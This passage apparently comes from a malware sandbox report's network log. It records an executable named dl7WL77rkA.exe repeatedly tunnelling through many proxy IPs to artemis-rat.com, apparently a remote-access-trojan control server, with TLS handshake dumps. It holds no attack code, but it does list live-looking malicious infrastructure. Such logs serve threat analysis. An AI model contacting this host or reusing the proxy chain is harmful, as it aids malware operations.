                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.316281080 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.549727172.67.200.220803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.172789097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.327132940 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.549711184.169.154.119803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.174758911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.349553108 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.350061893 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c cc f1 1d cd 13 3f b2 f7 91 14 04 9c 85 c2 82 7e 8f 87 c7 2a 6e f2 67 f0 2b de ea c9 80 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el?~*ng+*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.524085999 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 6c 73 b6 95 e1 ce 16 23 ed ef d8 e5 d6 51 9b 9f 95 18 18 aa 4f 78 12 d7 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9ls#QOxDOWNGRD0000*H010Uartemis-rat.com0240311021340Z260311021340Z010Uartemis-rat.com0"0*H0r.X=
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.568624973 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 f0 57 6a 40 ab 40 55 b9 16 db f2 d8 b6 da f4 6f af b3 75 08 3d 3a 24 87 2f cc 9c 2e 50 18 02 16 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 19 7d 62 ae ea ff e2 00 44 78 69 fa 86 ba 93 8a 6c 1c b3 7e 44
                                                                                                                                                                                                                                                            Data Ascii: %! Wj@@Uou=:$/.P(}bDxil~D)fj-
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.741276026 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b0 92 2d f6 cd fe f7 88 86 a5 17 f4 7a 04 d6 cd ab 0c 61 0b 12 d8 3c 72 c3 bc e2 cb 06 dd a9 d0 da e4 d9 66 25 13 4d fa
                                                                                                                                                                                                                                                            Data Ascii: (-za<rf%M


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.54973550.63.12.101106473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.200896978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.654917955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.154901981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.154918909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.154879093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217761993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.239248991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405343056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.475188971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.549752104.16.224.33803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.221856117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.376415968 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.549766172.67.105.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.245171070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.399528980 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.549855103.133.222.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.281909943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            11192.168.2.549858103.133.222.1704433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.286183119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            12192.168.2.549787104.23.141.196803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.298402071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.453550100 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            13192.168.2.54972251.38.231.41803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.320893049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.631784916 CET441INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                                                                            Allow: OPTIONS,GET,HEAD,POST,TRACE
                                                                                                                                                                                                                                                            Content-Length: 225
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for the URL /.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            14192.168.2.549805172.67.181.144803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.345093012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.499386072 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            15192.168.2.549734185.164.163.13581183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.345211983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.669172049 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            16192.168.2.54977554.152.3.36803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.345324039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.562995911 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.564667940 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c cc 45 eb 02 cb c9 7f a4 fc a4 5f 44 ea 5d 0f 85 99 02 b2 88 e1 b3 83 9c a6 62 86 d8 c6 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elE_D]b*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.788659096 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 54 8b 2c 37 e7 02 bc 05 34 eb 17 64 ea 5d 71 fd 40 e4 80 b9 3c a9 5f 16 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9T,74d]q@<_DOWNGRD0000*H010Uartemis-rat.com0240311020648Z260311020648Z010Uartemis-rat.com0"0*H0gR
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.788744926 CET536INData Raw: 24 22 55 d3 0c 79 39 6e af 3a 98 27 7a 3e 18 e4 6d 4b ee 4e 08 e5 29 64 ea 23 33 6e 3b 87 15 7b cc fd 83 7b 12 18 1a 35 e3 c2 55 c6 b6 67 a4 6a da a3 01 ee c5 8e 36 16 fd 61 5b d8 78 48 39 5e ce fd 20 7f c1 e1 eb b8 0c c5 b3 80 c7 86 ba e4 e9 4e
                                                                                                                                                                                                                                                            Data Ascii: $"Uy9n:'z>mKN)d#3n;{{5Ugj6a[xH9^ NpE'{70kS% ,L!8o.pyYIQj[ou3}Pd=P;'],A`Y0j*I-ec{\d^a<.h17N)2,(
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.788805008 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.794245958 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 3f ad 60 a4 a2 a4 ce 81 8c 3f bc db 66 b7 22 31 d0 be 64 9b bd 00 14 cc 36 53 8f ff 13 ec f1 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 9c 58 8d 59 ad 24 b3 36 e2 57 55 fc 3d 9f 52 28 68 f4 68 4d f3
                                                                                                                                                                                                                                                            Data Ascii: %! ?`?f"1d6S(XY$6WU=R(hhM<.Rgx
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.009968996 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 0c a7 36 0b 04 c5 2e 8e 23 ea 1a bf 61 00 cb 1f 01 46 5e ed 40 b2 09 f7 96 9a e8 13 6c 64 14 61 19 bb e7 b3 e1 d7 d7 66
                                                                                                                                                                                                                                                            Data Ascii: (6.#aF^@ldaf


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            17192.168.2.549745203.74.125.1888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.346765995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
